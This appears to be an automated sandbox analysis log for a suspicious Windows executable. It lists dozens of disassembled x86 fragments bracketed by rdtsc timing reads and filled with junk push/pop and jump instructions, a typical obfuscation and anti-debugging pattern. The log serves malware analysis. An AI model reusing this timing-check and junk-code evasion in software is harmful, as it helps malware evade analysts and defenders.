Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 965F18 second address: 94C57B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jns 00007FE5B8D9CB56h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FE5B8D9CB58h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov dword ptr [ebp+12458CBDh], ecx 0x0000002d lea eax, dword ptr [ebp+1247AB89h] 0x00000033 adc dx, 93BAh 0x00000038 nop 0x00000039 jmp 00007FE5B8D9CB65h 0x0000003e push eax 0x0000003f pushad 0x00000040 jc 00007FE5B8D9CB58h 0x00000046 jc 00007FE5B8D9CB58h 0x0000004c popad 0x0000004d nop 0x0000004e jmp 00007FE5B8D9CB5Ah 0x00000053 call dword ptr [ebp+122D2F4Fh] 0x00000059 push esi 0x0000005a jg 00007FE5B8D9CB58h 0x00000060 pushad 0x00000061 popad 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 966582 second address: 96659B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE5B8F4A748h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FE5B8F4A746h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 96659B second address: 96659F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 96659F second address: 9665AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9665AE second address: 9665D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FE5B8D9CB6Ch 0x00000014 jmp 00007FE5B8D9CB66h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9665D8 second address: 9665E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A74Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 96669A second address: 9666A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9666A4 second address: 9666A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9666E5 second address: 9666E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9666E9 second address: 9666EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9666EF second address: 966701 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 je 00007FE5B8D9CB5Eh 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9667D0 second address: 966809 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE5B8F4A756h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007FE5B8F4A752h 0x00000017 popad 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 966809 second address: 966818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 966818 second address: 96681C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 96681C second address: 966838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [eax] 0x00000009 jno 00007FE5B8D9CB5Ah 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 966838 second address: 96683C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 966AB5 second address: 966ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 966F81 second address: 966F8E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 967293 second address: 9672B5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ecx, dword ptr [ebp+122D284Dh] 0x00000010 lea eax, dword ptr [ebp+1247ABCDh] 0x00000016 mov dword ptr [ebp+1244B5FAh], ebx 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9672B5 second address: 9672BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A9197 second address: 9A91A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE5B8D9CB5Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A91A7 second address: 9A91B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push esi 0x00000008 jns 00007FE5B8F4A746h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A9798 second address: 9A979C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A979C second address: 9A97BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8F4A758h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A9C5A second address: 9A9C73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB65h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A9C73 second address: 9A9C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE5B8F4A757h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A9C90 second address: 9A9CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB65h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9A9CAB second address: 9A9CB8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9B328F second address: 9B3299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9B2E3E second address: 9B2E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9B2E43 second address: 9B2E60 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jc 00007FE5B8D9CB56h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jo 00007FE5B8D9CB62h 0x00000015 js 00007FE5B8D9CB56h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9B5286 second address: 9B528A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9B528A second address: 9B528E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9B528E second address: 9B52A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FE5B8F4A74Ah 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9B52A5 second address: 9B52AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9B546F second address: 9B547E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jnp 00007FE5B8F4A74Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9B547E second address: 9B5488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9B5488 second address: 9B548C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9B548C second address: 9B54A7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE5B8D9CB5Eh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BC168 second address: 9BC18D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007FE5B8F4A757h 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BC18D second address: 9BC1A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE5B8D9CB64h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BC1A7 second address: 9BC1BD instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FE5B8F4A74Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BC1BD second address: 9BC1C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BAAA9 second address: 9BAAAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BAAAD second address: 9BAAB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BAAB1 second address: 9BAACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE5B8F4A750h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BAACB second address: 9BAAD1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BAAD1 second address: 9BAAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BAAD7 second address: 9BAAE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8D9CB5Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BAAE6 second address: 9BAB0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A752h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnc 00007FE5B8F4A746h 0x00000012 jl 00007FE5B8F4A746h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BAC29 second address: 9BAC2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BAC2D second address: 9BAC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BAC33 second address: 9BAC3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BAEF4 second address: 9BAEFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BAEFA second address: 9BAF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BAF05 second address: 9BAF0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BB1F0 second address: 9BB1F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BB1F5 second address: 9BB1FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BB1FB second address: 9BB1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 966CBF second address: 966CC9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 966CC9 second address: 966CDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FE5B8D9CB56h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BB4A5 second address: 9BB4AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BB4AB second address: 9BB4BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8D9CB5Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BF9A3 second address: 9BF9BC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FE5B8F4A74Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9BFB23 second address: 9BFB27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9C3221 second address: 9C3225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9C3225 second address: 9C323C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE5B8D9CB56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE5B8D9CB5Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9C2C24 second address: 9C2C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9CA669 second address: 9CA66E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9CAA8C second address: 9CAAC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8F4A74Ah 0x00000009 popad 0x0000000a jmp 00007FE5B8F4A757h 0x0000000f jl 00007FE5B8F4A74Ch 0x00000015 jg 00007FE5B8F4A746h 0x0000001b popad 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9CAD74 second address: 9CAD78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9CB5A6 second address: 9CB5B3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9CB5B3 second address: 9CB5D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE5B8D9CB67h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9D4B70 second address: 9D4B74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9D449C second address: 9D44A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9D44A0 second address: 9D44A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9D4788 second address: 9D4799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jmp 00007FE5B8D9CB5Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9D4799 second address: 9D47A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9DA91C second address: 9DA920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9DAA95 second address: 9DAA9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9DAED7 second address: 9DAEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9DB44D second address: 9DB46A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A753h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9DB46A second address: 9DB470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9DB470 second address: 9DB474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9DB474 second address: 9DB478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9DB478 second address: 9DB47E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9DB47E second address: 9DB4CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop esi 0x0000000f pushad 0x00000010 jmp 00007FE5B8D9CB67h 0x00000015 jg 00007FE5B8D9CB56h 0x0000001b jnl 00007FE5B8D9CB56h 0x00000021 jmp 00007FE5B8D9CB5Eh 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9DB4CF second address: 9DB4DD instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE5B8F4A748h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9E1C60 second address: 9E1C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE5B8D9CB60h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9E1C80 second address: 9E1C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 9E1C84 second address: 9E1C94 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE5B8D9CB56h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
